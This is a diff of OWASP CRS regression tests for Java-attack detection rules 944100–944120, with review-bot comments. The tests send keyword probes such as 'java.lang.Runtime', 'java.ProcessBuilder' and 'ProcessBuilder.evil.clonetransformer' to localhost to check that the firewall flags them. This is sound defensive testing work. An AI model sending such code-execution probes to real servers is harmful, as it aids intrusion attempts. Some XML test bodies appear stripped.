Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_id: 13 desc: XML attribute value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_id: 14 desc: XML element value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_id: 15 desc: XML element includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_id: 16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" 
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_id: 17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_id: 18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index ca0eef8c9..294ee8250 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml 
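Review bot: The `application/xml` tests 11–18 carry bodies that read here as bare `value`, `element_value` and `java.lang.Runtime` rather than XML documents, so tests 12 and 13 (attribute name vs. attribute value, both with `data: "element_value"`) and likewise 16 and 17 cannot differ in the `XML:/*` / `XML://@*` targets their `desc:` lines claim to exercise. This is most likely the rendering stripping angle-bracketed markup, but the new side should be checked to confirm each of these `data:` values still holds a well-formed element with the keyword in the position the description names. Where the bodies do contain markup with quotes, a block scalar such as `data: |-` keeps them readable without escaping.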
@@ -1,373 +1,354 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944110.yaml" description: "Description" +rule_id: 944110 tests: - - test_title: 944110-1 + - test_id: 1 desc: Argument test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log_contains: "id \"944110\"" + - test_id: 2 desc: Argument test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.ProcessBuilder" - output: - log_contains: "id \"944110\"" - - test_title: 944110-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log_contains: "id \"944110\"" + - test_id: 3 desc: Argument name includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log_contains: "id \"944110\"" + - test_id: 4 desc: Argument name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log_contains: "id \"944110\"" + - test_id: 5 desc: Cookie test includes keywords 
java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 6 desc: Cookie test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 7 desc: Cookie name includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 8 desc: Cookie name includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 9 desc: Request header test includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 10 desc: Request header test includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_id: 11 desc: XML element includes keywords java. 
and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_id: 12 desc: XML attribute name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_id: 13 desc: XML attribute value includes keywords 
java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_id: 14 desc: XML element value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime" + output: + log_contains: "id \"944110\"" + - test_id: 15 desc: XML element includes keywords java. 
and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_id: 16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_id: 17 desc: XML attribute value includes 
keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944110\"" + - test_id: 18 desc: XML element value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder" - output: - log_contains: "id \"944110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log_contains: "id \"944110\"" 
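Review bot: The re-emitted `input:` blocks of every test in this hunk keep the file's mixed scalar quoting — `Content-Type: "text/plain"`, `uri: "/post"` and `data: "..."` are quoted while `Accept: text/xml,...`, `Accept-Encoding: gzip,deflate`, `Accept-Language: en-us,en;q=0.5`, `method: POST`, `version: HTTP/1.0` and `Cookie: test=java.Runtime` are plain — whereas the 944120.yaml section that follows quotes every request field; since the commit rewrites all of these lines anyway, quoting them uniformly here (`method: "POST"`, `version: "HTTP/1.0"`, `Accept: "text/xml,..."`) would make the two files consistent and keep a future value such as `yes`/`no`/`3.10` from being retyped by the parser. The unchanged `desc` of test 16 still reads `keyworda java. and ProcessBuilder` where `keywords` is meant, and `description: "Description"` in `meta` is likewise a pre-existing placeholder that this rewrite could have replaced with a one-line summary like the `"Positive tests for rule 944120"` used in the next file. In this view the XML tests (11–18) show `data:` as only `value` or `element_value`, which presumably reflects markup stripped in rendering rather than the committed payload; worth a quick check that the element and attribute names still carry the `java.Runtime` / `java.ProcessBuilder` tokens the positive `log_contains` assertions depend on.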
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
index b1c48a52e..3701d12e9 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml
@@ -1,2945 +1,2808 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944120.yaml" description: "Positive tests for rule 944120" +rule_id: 944120 tests: - - test_title: 944120-1 + - test_id: 1 desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 2 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + 
